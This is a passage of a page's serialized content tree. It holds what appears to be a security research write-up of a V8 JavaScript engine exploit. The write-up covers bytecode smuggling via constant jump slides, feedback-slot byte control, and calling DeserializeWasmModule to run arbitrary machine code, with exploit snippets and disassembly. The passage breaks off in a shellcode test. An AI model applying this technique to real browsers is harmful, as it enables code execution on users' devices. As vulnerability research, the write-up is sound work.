-9.255963134931783e61;\n",[135009],{"type":26,"tag":130,"props":135010,"children":135011},{"__ignoreMap":7},[135012,135040,135067,135094],{"type":26,"tag":137,"props":135013,"children":135014},{"class":5559,"line":5560},[135015,135019,135023,135027,135031,135036],{"type":26,"tag":137,"props":135016,"children":135017},{"style":5573},[135018],{"type":32,"value":14378},{"type":26,"tag":137,"props":135020,"children":135021},{"style":5584},[135022],{"type":32,"value":92438},{"type":26,"tag":137,"props":135024,"children":135025},{"style":5590},[135026],{"type":32,"value":5593},{"type":26,"tag":137,"props":135028,"children":135029},{"style":5590},[135030],{"type":32,"value":53858},{"type":26,"tag":137,"props":135032,"children":135033},{"style":5626},[135034],{"type":32,"value":135035},"9.255963134931783e61",{"type":26,"tag":137,"props":135037,"children":135038},{"style":5601},[135039],{"type":32,"value":5604},{"type":26,"tag":137,"props":135041,"children":135042},{"class":5559,"line":5412},[135043,135047,135051,135055,135059,135063],{"type":26,"tag":137,"props":135044,"children":135045},{"style":5573},[135046],{"type":32,"value":14378},{"type":26,"tag":137,"props":135048,"children":135049},{"style":5584},[135050],{"type":32,"value":93311},{"type":26,"tag":137,"props":135052,"children":135053},{"style":5590},[135054],{"type":32,"value":5593},{"type":26,"tag":137,"props":135056,"children":135057},{"style":5590},[135058],{"type":32,"value":53858},{"type":26,"tag":137,"props":135060,"children":135061},{"style":5626},[135062],{"type":32,"value":135035},{"type":26,"tag":137,"props":135064,"children":135065},{"style":5601},[135066],{"type":32,"value":5604},{"type":26,"tag":137,"props":135068,"children":135069},{"class":5559,"line":5417},[135070,135074,135078,135082,135086,135090],{"type":26,"tag":137,"props":135071,"children":135072},{"style":5573},[135073],{"type":32,"value":14378},{"type":26,"tag":137,"props":135075,"children":135076},{"style":5584},[135077],{"type":32,"value":40041},{"type":26,"tag":137,"props":135079,"children":135080},{"style":5590},[135081],{"type":32,"value":5593},{"type":26,"tag":137,"props":135083,"children":135084},{"style":5590},[135085],{"type":32,"value":53858},{"type":26,"tag":137,"props":135087,"children":135088},{"style":5626},[135089],{"type":32,"value":135035},{"type":26,"tag":137,"props":135091,"children":135092},{"style":5601},[135093],{"type":32,"value":5604},{"type":26,"tag":137,"props":135095,"children":135096},{"class":5559,"line":5642},[135097,135101,135105,135109,135113,135117],{"type":26,"tag":137,"props":135098,"children":135099},{"style":5573},[135100],{"type":32,"value":14378},{"type":26,"tag":137,"props":135102,"children":135103},{"style":5584},[135104],{"type":32,"value":134803},{"type":26,"tag":137,"props":135106,"children":135107},{"style":5590},[135108],{"type":32,"value":5593},{"type":26,"tag":137,"props":135110,"children":135111},{"style":5590},[135112],{"type":32,"value":53858},{"type":26,"tag":137,"props":135114,"children":135115},{"style":5626},[135116],{"type":32,"value":135035},{"type":26,"tag":137,"props":135118,"children":135119},{"style":5601},[135120],{"type":32,"value":5604},{"type":26,"tag":35,"props":135122,"children":135123},{},[135124],{"type":32,"value":135125},"These floating-point constants will compile to 8-byte constants inside the machine code (the last 2 of which are used to jump into the next constant).",{"type":26,"tag":35,"props":135127,"children":135128},{},[135129],{"type":32,"value":135130},"We'll use a similar principle here, although much more limited. With",{"type":26,"tag":5512,"props":135132,"children":135134},{"code":135133},"let a = 0x0693bebe;\n",[135135],{"type":26,"tag":130,"props":135136,"children":135137},{"__ignoreMap":7},[135138],{"type":32,"value":135133},{"type":26,"tag":35,"props":135140,"children":135141},{},[135142],{"type":32,"value":135143},"We will compile the bytecode:",{"type":26,"tag":5512,"props":135145,"children":135147},{"code":135146},"01 0d be be 93 06 LdaSmi.ExtraWide\n",[135148],{"type":26,"tag":130,"props":135149,"children":135150},{"__ignoreMap":7},[135151],{"type":32,"value":135146},{"type":26,"tag":35,"props":135153,"children":135154},{},[135155,135157,135163,135165,135171,135172,135178],{"type":32,"value":135156},"We can then jump to the 3rd byte (",{"type":26,"tag":130,"props":135158,"children":135160},{"className":135159},[],[135161],{"type":32,"value":135162},"0xbe",{"type":32,"value":135164},"), and gain 2 controlled bytes of execution, followed by ",{"type":26,"tag":130,"props":135166,"children":135168},{"className":135167},[],[135169],{"type":32,"value":135170},"0x93 0x02 - 0xf",{"type":32,"value":4625},{"type":26,"tag":130,"props":135173,"children":135175},{"className":135174},[],[135176],{"type":32,"value":135177},"Jump +[2-15]",{"type":32,"value":135179},") to jump into the next constant.",{"type":26,"tag":35,"props":135181,"children":135182},{},[135183,135185,135191,135193,135199,135201,135207],{"type":32,"value":135184},"Note that the jump constant will change as the subsequent store instruction becomes longer due to storing to deeper registers. Storing to registers 1-15 resulted in simple one byte ",{"type":26,"tag":130,"props":135186,"children":135188},{"className":135187},[],[135189],{"type":32,"value":135190},"StarX",{"type":32,"value":135192}," instructions, registers 16-121 resulted in two bytes ",{"type":26,"tag":130,"props":135194,"children":135196},{"className":135195},[],[135197],{"type":32,"value":135198},"Star rX",{"type":32,"value":135200}," instructions, and the next batch resulted in 4 byte ",{"type":26,"tag":130,"props":135202,"children":135204},{"className":135203},[],[135205],{"type":32,"value":135206},"Star.ExtraWide rX",{"type":32,"value":135208}," instructions.",{"type":26,"tag":35,"props":135210,"children":135211},{},[135212,135214,135220],{"type":32,"value":135213},"With these short jumps, we can actually construct a massive jump slide of constants like ",{"type":26,"tag":130,"props":135215,"children":135217},{"className":135216},[],[135218],{"type":32,"value":135219},"0x8931111",{"type":32,"value":7072},{"type":26,"tag":5512,"props":135222,"children":135224},{"code":135223,"language":33960,"meta":7,"className":33958,"style":7},"let a206 = 0x8931111;\nlet a207 = 0x8931111;\nlet a208 = 0x8931111;\nlet a209 = 0x8931111;\nlet a210 = 0x8931111;\nlet a211 = 0x8931111;\nlet a212 = 0x8931111;\n",[135225],{"type":26,"tag":130,"props":135226,"children":135227},{"__ignoreMap":7},[135228,135253,135277,135301,135325,135349,135373],{"type":26,"tag":137,"props":135229,"children":135230},{"class":5559,"line":5560},[135231,135235,135240,135244,135249],{"type":26,"tag":137,"props":135232,"children":135233},{"style":5573},[135234],{"type":32,"value":14378},{"type":26,"tag":137,"props":135236,"children":135237},{"style":5584},[135238],{"type":32,"value":135239}," a206",{"type":26,"tag":137,"props":135241,"children":135242},{"style":5590},[135243],{"type":32,"value":5593},{"type":26,"tag":137,"props":135245,"children":135246},{"style":5626},[135247],{"type":32,"value":135248}," 0x8931111",{"type":26,"tag":137,"props":135250,"children":135251},{"style":5601},[135252],{"type":32,"value":5604},{"type":26,"tag":137,"props":135254,"children":135255},{"class":5559,"line":5412},[135256,135260,135265,135269,135273],{"type":26,"tag":137,"props":135257,"children":135258},{"style":5573},[135259],{"type":32,"value":14378},{"type":26,"tag":137,"props":135261,"children":135262},{"style":5584},[135263],{"type":32,"value":135264}," a207",{"type":26,"tag":137,"props":135266,"children":135267},{"style":5590},[135268],{"type":32,"value":5593},{"type":26,"tag":137,"props":135270,"children":135271},{"style":5626},[135272],{"type":32,"value":135248},{"type":26,"tag":137,"props":135274,"children":135275},{"style":5601},[135276],{"type":32,"value":5604},{"type":26,"tag":137,"props":135278,"children":135279},{"class":5559,"line":5417},[135280,135284,135289,135293,135297],{"type":26,"tag":137,"props":135281,"children":135282},{"style":5573},[135283],{"type":32,"value":14378},{"type":26,"tag":137,"props":135285,"children":135286},{"style":5584},[135287],{"type":32,"value":135288}," a208",{"type":26,"tag":137,"props":135290,"children":135291},{"style":5590},[135292],{"type":32,"value":5593},{"type":26,"tag":137,"props":135294,"children":135295},{"style":5626},[135296],{"type":32,"value":135248},{"type":26,"tag":137,"props":135298,"children":135299},{"style":5601},[135300],{"type":32,"value":5604},{"type":26,"tag":137,"props":135302,"children":135303},{"class":5559,"line":5642},[135304,135308,135313,135317,135321],{"type":26,"tag":137,"props":135305,"children":135306},{"style":5573},[135307],{"type":32,"value":14378},{"type":26,"tag":137,"props":135309,"children":135310},{"style":5584},[135311],{"type":32,"value":135312}," a209",{"type":26,"tag":137,"props":135314,"children":135315},{"style":5590},[135316],{"type":32,"value":5593},{"type":26,"tag":137,"props":135318,"children":135319},{"style":5626},[135320],{"type":32,"value":135248},{"type":26,"tag":137,"props":135322,"children":135323},{"style":5601},[135324],{"type":32,"value":5604},{"type":26,"tag":137,"props":135326,"children":135327},{"class":5559,"line":5745},[135328,135332,135337,135341,135345],{"type":26,"tag":137,"props":135329,"children":135330},{"style":5573},[135331],{"type":32,"value":14378},{"type":26,"tag":137,"props":135333,"children":135334},{"style":5584},[135335],{"type":32,"value":135336}," a210",{"type":26,"tag":137,"props":135338,"children":135339},{"style":5590},[135340],{"type":32,"value":5593},{"type":26,"tag":137,"props":135342,"children":135343},{"style":5626},[135344],{"type":32,"value":135248},{"type":26,"tag":137,"props":135346,"children":135347},{"style":5601},[135348],{"type":32,"value":5604},{"type":26,"tag":137,"props":135350,"children":135351},{"class":5559,"line":5850},[135352,135356,135361,135365,135369],{"type":26,"tag":137,"props":135353,"children":135354},{"style":5573},[135355],{"type":32,"value":14378},{"type":26,"tag":137,"props":135357,"children":135358},{"style":5584},[135359],{"type":32,"value":135360}," a211",{"type":26,"tag":137,"props":135362,"children":135363},{"style":5590},[135364],{"type":32,"value":5593},{"type":26,"tag":137,"props":135366,"children":135367},{"style":5626},[135368],{"type":32,"value":135248},{"type":26,"tag":137,"props":135370,"children":135371},{"style":5601},[135372],{"type":32,"value":5604},{"type":26,"tag":137,"props":135374,"children":135375},{"class":5559,"line":5878},[135376,135380,135385,135389,135393],{"type":26,"tag":137,"props":135377,"children":135378},{"style":5573},[135379],{"type":32,"value":14378},{"type":26,"tag":137,"props":135381,"children":135382},{"style":5584},[135383],{"type":32,"value":135384}," a212",{"type":26,"tag":137,"props":135386,"children":135387},{"style":5590},[135388],{"type":32,"value":5593},{"type":26,"tag":137,"props":135390,"children":135391},{"style":5626},[135392],{"type":32,"value":135248},{"type":26,"tag":137,"props":135394,"children":135395},{"style":5601},[135396],{"type":32,"value":5604},{"type":26,"tag":35,"props":135398,"children":135399},{},[135400],{"type":32,"value":135401},"Those instructions result in:",{"type":26,"tag":5512,"props":135403,"children":135405},{"code":135404},"00: LdaTrue;\n01: LdaTrue;\n02: Jump +8;  >------------+\n04: Star rX + LdaSmi ...   |\nv--------------------------+\n0a: LdaTrue;\n0b: LdaTrue;\n",[135406],{"type":26,"tag":130,"props":135407,"children":135408},{"__ignoreMap":7},[135409],{"type":32,"value":135404},{"type":26,"tag":35,"props":135411,"children":135412},{},[135413,135415,135421,135423,135427],{"type":32,"value":135414},"(The offset of ",{"type":26,"tag":130,"props":135416,"children":135418},{"className":135417},[],[135419],{"type":32,"value":135420},"Jump",{"type":32,"value":135422}," instructions is added to the ",{"type":26,"tag":762,"props":135424,"children":135425},{},[135426],{"type":32,"value":73692},{"type":32,"value":135428}," of the instruction.)",{"type":26,"tag":35,"props":135430,"children":135431},{},[135432,135434,135440],{"type":32,"value":135433},"Now, 3 out of the 6 bytes in a ",{"type":26,"tag":130,"props":135435,"children":135437},{"className":135436},[],[135438],{"type":32,"value":135439},"LdaSmi.ExtraWide",{"type":32,"value":135441}," instruction are valid for merging into the smuggled arbitrary Ignition bytecode. This slide made exploit development a lot easier, as any additional code would cause the exception table to have new offsets.",{"type":26,"tag":118,"props":135443,"children":135445},{"id":135444},"exploit-goal",[135446],{"type":32,"value":135447},"Exploit Goal",{"type":26,"tag":35,"props":135449,"children":135450},{},[135451,135453,135459,135460,135466],{"type":32,"value":135452},"Initially we considered using ",{"type":26,"tag":130,"props":135454,"children":135456},{"className":135455},[],[135457],{"type":32,"value":135458},"Star",{"type":32,"value":7162},{"type":26,"tag":130,"props":135461,"children":135463},{"className":135462},[],[135464],{"type":32,"value":135465},"Ldar",{"type":32,"value":135467}," instructions to store to out-of-bounds register indexes, as registers are stored on the regular stack. However, with only 2 bytes we can only access +/- 0x7f registers, which does not allow us to go out of bounds enough to access interesting values.",{"type":26,"tag":35,"props":135469,"children":135470},{},[135471,135473,135480],{"type":32,"value":135472},"We realized that register offsets 0 and 1 contain the saved frame pointer and return address respectively. We considered using this to ",{"type":26,"tag":41,"props":135474,"children":135477},{"href":135475,"rel":135476},"https://github.com/google/google-ctf/tree/main/2023/quals/sandbox-v8box/solution",[45],[135478],{"type":32,"value":135479},"stack pivot and ROP",{"type":32,"value":135481},". However, there were numerous downsides - primarily, we would need multiple leaks of binary addresses and the JS heap (to construct a buffer with a fake stack frame).",{"type":26,"tag":35,"props":135483,"children":135484},{},[135485],{"type":32,"value":135486},"Additionally, the interpreter expects all values to be tagged V8 values (i.e. 32-bit compressed pointers or Smis). This means that operating on 64-bit addresses can cause surprising truncations or 'untagging' extensions.",{"type":26,"tag":35,"props":135488,"children":135489},{},[135490],{"type":32,"value":135491},"Finally, ROP/stack pivoting-based approaches would cause significant work when porting from our x86_64 development machines to the aarch64 target device, and might not even be feasible given the existence of PAC and BTI on the Galaxy S25.",{"type":26,"tag":35,"props":135493,"children":135494},{},[135495,135497,135503,135505,135511,135513,135519],{"type":32,"value":135496},"At this point, we identified an interesting opcode: ",{"type":26,"tag":130,"props":135498,"children":135500},{"className":135499},[],[135501],{"type":32,"value":135502},"CallRuntime",{"type":32,"value":135504},". Runtime functions are used to implement a lot of core V8 functionality, and are native functions exposed to bytecode (but not to the user, unless ",{"type":26,"tag":130,"props":135506,"children":135508},{"className":135507},[],[135509],{"type":32,"value":135510},"--allow-natives-syntax",{"type":32,"value":135512}," is enabled). Many of these allow powerful functionality as inputs are assumed to be trusted, but one stands out: ",{"type":26,"tag":130,"props":135514,"children":135516},{"className":135515},[],[135517],{"type":32,"value":135518},"DeserializeWasmModule",{"type":32,"value":470},{"type":26,"tag":35,"props":135521,"children":135522},{},[135523,135525,135532,135533,135538,135539,135545,135547,135554],{"type":32,"value":135524},"WebAssembly modules may be internally serialized and deserialized by the runtime - this serialization format includes raw machine code for any ",{"type":26,"tag":41,"props":135526,"children":135529},{"href":135527,"rel":135528},"https://gist.github.com/Riatre/83d5fdb970946c8e185c5e1b2b842b1b",[45],[135530],{"type":32,"value":135531},"JIT-compiled functions",{"type":32,"value":21124},{"type":26,"tag":130,"props":135534,"children":135536},{"className":135535},[],[135537],{"type":32,"value":135518},{"type":32,"value":7162},{"type":26,"tag":130,"props":135540,"children":135542},{"className":135541},[],[135543],{"type":32,"value":135544},"SerializeWasmModule",{"type":32,"value":135546}," themselves are only used from test functions, and indeed have been ",{"type":26,"tag":41,"props":135548,"children":135551},{"href":135549,"rel":135550},"https://chromium-review.googlesource.com/c/v8/v8/+/6875821",[45],[135552],{"type":32,"value":135553},"removed",{"type":32,"value":135555}," from recent production V8 builds due to how abusable this functionality is.",{"type":26,"tag":35,"props":135557,"children":135558},{},[135559,135561,135567,135569,135575,135577,135582,135584,135590,135592,135597,135598,135603,135604,135609,135611,135617,135619,135623],{"type":32,"value":135560},"However, calling this opcode represented a significant challenge:\n",{"type":26,"tag":130,"props":135562,"children":135564},{"className":135563},[],[135565],{"type":32,"value":135566},"CallRuntime \u003Cfunc-id> \u003Cargs> \u003Cargc>",{"type":32,"value":135568},"\nWhere ",{"type":26,"tag":130,"props":135570,"children":135572},{"className":135571},[],[135573],{"type":32,"value":135574},"func-id",{"type":32,"value":135576}," is a 2-byte function ID, ",{"type":26,"tag":130,"props":135578,"children":135580},{"className":135579},[],[135581],{"type":32,"value":40824},{"type":32,"value":135583}," is the index of the last register passed and ",{"type":26,"tag":130,"props":135585,"children":135587},{"className":135586},[],[135588],{"type":32,"value":135589},"argc",{"type":32,"value":135591}," is the number of arguments passed (e.g. passing ",{"type":26,"tag":130,"props":135593,"children":135595},{"className":135594},[],[135596],{"type":32,"value":46982},{"type":32,"value":1108},{"type":26,"tag":130,"props":135599,"children":135601},{"className":135600},[],[135602],{"type":32,"value":47125},{"type":32,"value":3339},{"type":26,"tag":130,"props":135605,"children":135607},{"className":135606},[],[135608],{"type":32,"value":47108},{"type":32,"value":135610}," would be encoded as ",{"type":26,"tag":130,"props":135612,"children":135614},{"className":135613},[],[135615],{"type":32,"value":135616},"\u003Cr2> \u003C3>",{"type":32,"value":135618},").\nThis requires ",{"type":26,"tag":762,"props":135620,"children":135621},{},[135622],{"type":32,"value":20701},{"type":32,"value":135624}," bytes of control - additionally, we must then store the accumulator safely into a register, then return the value back to JS code.",{"type":26,"tag":118,"props":135626,"children":135628},{"id":135627},"better-bytecode-control",[135629],{"type":32,"value":135630},"Better Bytecode Control",{"type":26,"tag":35,"props":135632,"children":135633},{},[135634,135636,135643,135645,135651],{"type":32,"value":135635},"Luckily, arithmetic instructions in Ignition have a feature known as the '",{"type":26,"tag":41,"props":135637,"children":135640},{"href":135638,"rel":135639},"https://benediktmeurer.de/2017/12/13/an-introduction-to-speculative-optimization-in-v8/",[45],[135641],{"type":32,"value":135642},"feedback vector slot",{"type":32,"value":135644},"', where it stores profiling information for subsequent optimizations by Turbofan. Observationally, for the ",{"type":26,"tag":130,"props":135646,"children":135648},{"className":135647},[],[135649],{"type":32,"value":135650},"AddSmi",{"type":32,"value":135652}," instruction, it represents the number of operations performed on the target value so far.",{"type":26,"tag":35,"props":135654,"children":135655},{},[135656],{"type":32,"value":135657},"For example, we can look at the below Ignition disassembly:",{"type":26,"tag":5512,"props":135659,"children":135661},{"code":135660},"2000 : 01 0d 11 11 93 0e LdaSmi.ExtraWide [244519185]\n2006 : cd                Star1\n2007 : 00 1b ff ff 1d ff Mov.Wide \u003Ccontext>, r220\n2013 : 0b f8             Ldar r1\n2015 : 01 4b 11 11 93 0a 01 00 00 00 AddSmi.ExtraWide [177410321], [1]\n2025 : 0b f8             Ldar r1\n2027 : 01 4b 11 11 93 0a 02 00 00 00 AddSmi.ExtraWide [177410321], [2]\n2037 : 0b f8             Ldar r1\n2039 : 01 4b 11 11 93 0a 03 00 00 00 AddSmi.ExtraWide [177410321], [3]\n2049 : 0b f8             Ldar r1\n2051 : 01 4b 11 11 93 0a 04 00 00 00 AddSmi.ExtraWide [177410321], [4]\n2061 : 0b f8             Ldar r1\n2063 : 01 4b 11 11 93 0a 05 00 00 00 AddSmi.ExtraWide [177410321], [5]\n",[135662],{"type":26,"tag":130,"props":135663,"children":135664},{"__ignoreMap":7},[135665],{"type":32,"value":135660},{"type":26,"tag":35,"props":135667,"children":135668},{},[135669,135671,135677],{"type":32,"value":135670},"We can see the feedback vector slot increments for every operation. This means that with a smuggled jump slide through ",{"type":26,"tag":130,"props":135672,"children":135674},{"className":135673},[],[135675],{"type":32,"value":135676},"AddSmi.ExtraWide",{"type":32,"value":135678},", we can control almost 8 bytes (because of the SMI constraint) given enough addition instructions.",{"type":26,"tag":35,"props":135680,"children":135681},{},[135682],{"type":32,"value":135683},"Eventually, we can reach a stage like this:",{"type":26,"tag":5512,"props":135685,"children":135687},{"code":135686},"4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n",[135688],{"type":26,"tag":130,"props":135689,"children":135690},{"__ignoreMap":7},[135691],{"type":32,"value":135686},{"type":26,"tag":35,"props":135693,"children":135694},{},[135695],{"type":32,"value":135696},"If you skip the first two bytes, you have",{"type":26,"tag":3426,"props":135698,"children":135699},{},[135700,135731],{"type":26,"tag":3430,"props":135701,"children":135702},{},[135703,135708,135710,135715,135717,135723,135725],{"type":26,"tag":130,"props":135704,"children":135706},{"className":135705},[],[135707],{"type":32,"value":135502},{"type":32,"value":135709}," (0x6c) to ",{"type":26,"tag":130,"props":135711,"children":135713},{"className":135712},[],[135714],{"type":32,"value":135518},{"type":32,"value":135716}," (0x0266) starting from register ",{"type":26,"tag":130,"props":135718,"children":135720},{"className":135719},[],[135721],{"type":32,"value":135722},"a2",{"type":32,"value":135724}," (0x4) with 2 arguments (0x2). This becomes the call: ",{"type":26,"tag":130,"props":135726,"children":135728},{"className":135727},[],[135729],{"type":32,"value":135730},"DeserializeWasmModule(a2, a1)",{"type":26,"tag":3430,"props":135732,"children":135733},{},[135734],{"type":32,"value":135735},"a Jump instruction",{"type":26,"tag":118,"props":135737,"children":135739},{"id":135738},"returning-back-to-js",[135740],{"type":32,"value":135741},"Returning Back to JS",{"type":26,"tag":35,"props":135743,"children":135744},{},[135745,135747,135753],{"type":32,"value":135746},"After that call, the result is stored in the accumulator. Since this function is an async generator, we have to ",{"type":26,"tag":130,"props":135748,"children":135750},{"className":135749},[],[135751],{"type":32,"value":135752},"yield",{"type":32,"value":135754}," the result, but that results in a long series of instructions that we can't possibly smuggle.",{"type":26,"tag":35,"props":135756,"children":135757},{},[135758],{"type":32,"value":135759},"The solution here is simple: we use the smuggled control flow to merge back into the normal control flow, that leads us into a yield from the original JS. For example, in our exploit, all the additions were done in a try block:",{"type":26,"tag":5512,"props":135761,"children":135763},{"code":135762,"language":33960,"meta":7,"className":33958,"style":7},"try {\n  ${'a1 + 0xa931111;'.repeat(0x059302 - 1)}\n  a1 + 0x0402666c;\n  throw 0x393e91a;\n} catch (e) {\n  console.log(\"foo\");\n  yield a16;\n}\n",[135764],{"type":26,"tag":130,"props":135765,"children":135766},{"__ignoreMap":7},[135767,135778,135826,135847,135863,135886,135914,135931],{"type":26,"tag":137,"props":135768,"children":135769},{"class":5559,"line":5560},[135770,135774],{"type":26,"tag":137,"props":135771,"children":135772},{"style":5610},[135773],{"type":32,"value":50933},{"type":26,"tag":137,"props":135775,"children":135776},{"style":5601},[135777],{"type":32,"value":5875},{"type":26,"tag":137,"props":135779,"children":135780},{"class":5559,"line":5412},[135781,135786,135790,135795,135799,135804,135808,135813,135817,135821],{"type":26,"tag":137,"props":135782,"children":135783},{"style":5584},[135784],{"type":32,"value":135785},"  $",{"type":26,"tag":137,"props":135787,"children":135788},{"style":5601},[135789],{"type":32,"value":79221},{"type":26,"tag":137,"props":135791,"children":135792},{"style":6837},[135793],{"type":32,"value":135794},"'a1 + 0xa931111;'",{"type":26,"tag":137,"props":135796,"children":135797},{"style":5601},[135798],{"type":32,"value":470},{"type":26,"tag":137,"props":135800,"children":135801},{"style":5682},[135802],{"type":32,"value":135803},"repeat",{"type":26,"tag":137,"props":135805,"children":135806},{"style":5601},[135807],{"type":32,"value":165},{"type":26,"tag":137,"props":135809,"children":135810},{"style":5626},[135811],{"type":32,"value":135812},"0x059302",{"type":26,"tag":137,"props":135814,"children":135815},{"style":5590},[135816],{"type":32,"value":53858},{"type":26,"tag":137,"props":135818,"children":135819},{"style":5626},[135820],{"type":32,"value":7104},{"type":26,"tag":137,"props":135822,"children":135823},{"style":5601},[135824],{"type":32,"value":135825},")}\n",{"type":26,"tag":137,"props":135827,"children":135828},{"class":5559,"line":5417},[135829,135834,135838,135843],{"type":26,"tag":137,"props":135830,"children":135831},{"style":5584},[135832],{"type":32,"value":135833},"  a1",{"type":26,"tag":137,"props":135835,"children":135836},{"style":5590},[135837],{"type":32,"value":11491},{"type":26,"tag":137,"props":135839,"children":135840},{"style":5626},[135841],{"type":32,"value":135842}," 0x0402666c",{"type":26,"tag":137,"props":135844,"children":135845},{"style":5601},[135846],{"type":32,"value":5604},{"type":26,"tag":137,"props":135848,"children":135849},{"class":5559,"line":5642},[135850,135854,135859],{"type":26,"tag":137,"props":135851,"children":135852},{"style":5610},[135853],{"type":32,"value":37798},{"type":26,"tag":137,"props":135855,"children":135856},{"style":5626},[135857],{"type":32,"value":135858}," 0x393e91a",{"type":26,"tag":137,"props":135860,"children":135861},{"style":5601},[135862],{"type":32,"value":5604},{"type":26,"tag":137,"props":135864,"children":135865},{"class":5559,"line":5745},[135866,135870,135874,135878,135882],{"type":26,"tag":137,"props":135867,"children":135868},{"style":5601},[135869],{"type":32,"value":49476},{"type":26,"tag":137,"props":135871,"children":135872},{"style":5610},[135873],{"type":32,"value":51013},{"type":26,"tag":137,"props":135875,"children":135876},{"style":5601},[135877],{"type":32,"value":4625},{"type":26,"tag":137,"props":135879,"children":135880},{"style":5584},[135881],{"type":32,"value":54057},{"type":26,"tag":137,"props":135883,"children":135884},{"style":5601},[135885],{"type":32,"value":17395},{"type":26,"tag":137,"props":135887,"children":135888},{"class":5559,"line":5850},[135889,135893,135897,135901,135905,135910],{"type":26,"tag":137,"props":135890,"children":135891},{"style":5584},[135892],{"type":32,"value":104525},{"type":26,"tag":137,"props":135894,"children":135895},{"style":5601},[135896],{"type":32,"value":470},{"type":26,"tag":137,"props":135898,"children":135899},{"style":5682},[135900],{"type":32,"value":104534},{"type":26,"tag":137,"props":135902,"children":135903},{"style":5601},[135904],{"type":32,"value":165},{"type":26,"tag":137,"props":135906,"children":135907},{"style":6837},[135908],{"type":32,"value":135909},"\"foo\"",{"type":26,"tag":137,"props":135911,"children":135912},{"style":5601},[135913],{"type":32,"value":6430},{"type":26,"tag":137,"props":135915,"children":135916},{"class":5559,"line":5878},[135917,135922,135927],{"type":26,"tag":137,"props":135918,"children":135919},{"style":5610},[135920],{"type":32,"value":135921},"  yield",{"type":26,"tag":137,"props":135923,"children":135924},{"style":5584},[135925],{"type":32,"value":135926}," a16",{"type":26,"tag":137,"props":135928,"children":135929},{"style":5601},[135930],{"type":32,"value":5604},{"type":26,"tag":137,"props":135932,"children":135933},{"class":5559,"line":5891},[135934],{"type":26,"tag":137,"props":135935,"children":135936},{"style":5601},[135937],{"type":32,"value":6507},{"type":26,"tag":35,"props":135939,"children":135940},{},[135941,135943],{"type":32,"value":135942},"Starting from the final ",{"type":26,"tag":130,"props":135944,"children":135946},{"className":135945},[],[135947],{"type":32,"value":135650},{"type":26,"tag":5512,"props":135949,"children":135951},{"code":135950}," 4385774 : 01 4b 6c 66 02 04 02 93 05 00 AddSmi.ExtraWide [67266156], [365314]\n 4385784 : 01 0d 1a e9 93 03 LdaSmi.ExtraWide [60025114]\n 4385790 : b1                Throw\n 4385791 : 00 1a 1a ff       Star.Wide r223\n",[135952],{"type":26,"tag":130,"props":135953,"children":135954},{"__ignoreMap":7},[135955],{"type":32,"value":135950},{"type":26,"tag":35,"props":135957,"children":135958},{},[135959,135961,135966,135968,135974],{"type":32,"value":135960},"The smuggled jump in ",{"type":26,"tag":130,"props":135962,"children":135964},{"className":135963},[],[135965],{"type":32,"value":135650},{"type":32,"value":135967}," will redirect us to ",{"type":26,"tag":130,"props":135969,"children":135971},{"className":135970},[],[135972],{"type":32,"value":135973},"1a e9 93 03",{"type":32,"value":135975},", which results in:",{"type":26,"tag":3426,"props":135977,"children":135978},{},[135979,135990],{"type":26,"tag":3430,"props":135980,"children":135981},{},[135982,135988],{"type":26,"tag":130,"props":135983,"children":135985},{"className":135984},[],[135986],{"type":32,"value":135987},"Star r16",{"type":32,"value":135989}," (store accumulator to r16)",{"type":26,"tag":3430,"props":135991,"children":135992},{},[135993,135998],{"type":26,"tag":130,"props":135994,"children":135996},{"className":135995},[],[135997],{"type":32,"value":135420},{"type":32,"value":135999}," past the throw into the catch relevant code",{"type":26,"tag":35,"props":136001,"children":136002},{},[136003,136005,136011],{"type":32,"value":136004},"This will bring us nicely to the final ",{"type":26,"tag":130,"props":136006,"children":136008},{"className":136007},[],[136009],{"type":32,"value":136010},"yield a16",{"type":32,"value":136012},", and we now have a Deserialized Wasm Module with our own arbitrary machine code.",{"type":26,"tag":118,"props":136014,"children":136016},{"id":136015},"executing-shellcode",[136017],{"type":32,"value":136018},"Executing Shellcode",{"type":26,"tag":35,"props":136020,"children":136021},{},[136022],{"type":32,"value":136023},"To test this, we first serialize a small WebAssembly module and print the resulting Uint8Array:",{"type":26,"tag":5512,"props":136025,"children":136027},{"code":136026,"language":38211,"meta":7,"className":38209,"style":7},"var wasm_code = new Uint8Array([\n  0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n  0, 0, 10, 4, 1, 2, 0, 11,\n]);\nvar mod = new WebAssembly.Module(wasm_code);\nvar inst = new WebAssembly.Instance(mod);\nvar func = inst.exports.shell;\n\n%WasmTierUpFunction(func);\nvar serialized = %SerializeWasmModule(mod);\nlet result = new Uint8Array(serialized);\nconsole.log('[' + result.join(', ') + ']');\n",[136028],{"type":26,"tag":130,"props":136029,"children":136030},{"__ignoreMap":7},[136031,136061,136288,136356,136363,136408,136454,136494,136501,136525,136562,136598],{"type":26,"tag":137,"props":136032,"children":136033},{"class":5559,"line":5560},[136034,136038,136043,136047,136051,136056],{"type":26,"tag":137,"props":136035,"children":136036},{"style":5573},[136037],{"type":32,"value":37643},{"type":26,"tag":137,"props":136039,"children":136040},{"style":5584},[136041],{"type":32,"value":136042}," wasm_code",{"type":26,"tag":137,"props":136044,"children":136045},{"style":5590},[136046],{"type":32,"value":5593},{"type":26,"tag":137,"props":136048,"children":136049},{"style":5573},[136050],{"type":32,"value":34528},{"type":26,"tag":137,"props":136052,"children":136053},{"style":5682},[136054],{"type":32,"value":136055}," Uint8Array",{"type":26,"tag":137,"props":136057,"children":136058},{"style":5601},[136059],{"type":32,"value":136060},"([\n",{"type":26,"tag":137,"props":136062,"children":136063},{"class":5559,"line":5412},[136064,136069,136073,136078,136082,136087,136091,136096,136100,136104,136108,136112,136116,136120,136124,136128,136132,136136,136140,136144,136148,136152,136156,136161,136165,136169,136173,136177,136181,136185,136189,136193,136197,136201,136205,136209,136213,136217,136221,136225,136229,136233,136237,136241,136245,136249,136253,136258,136262,136267,136271,136276,136280,136284],{"type":26,"tag":137,"props":136065,"children":136066},{"style":5626},[136067],{"type":32,"value":136068},"  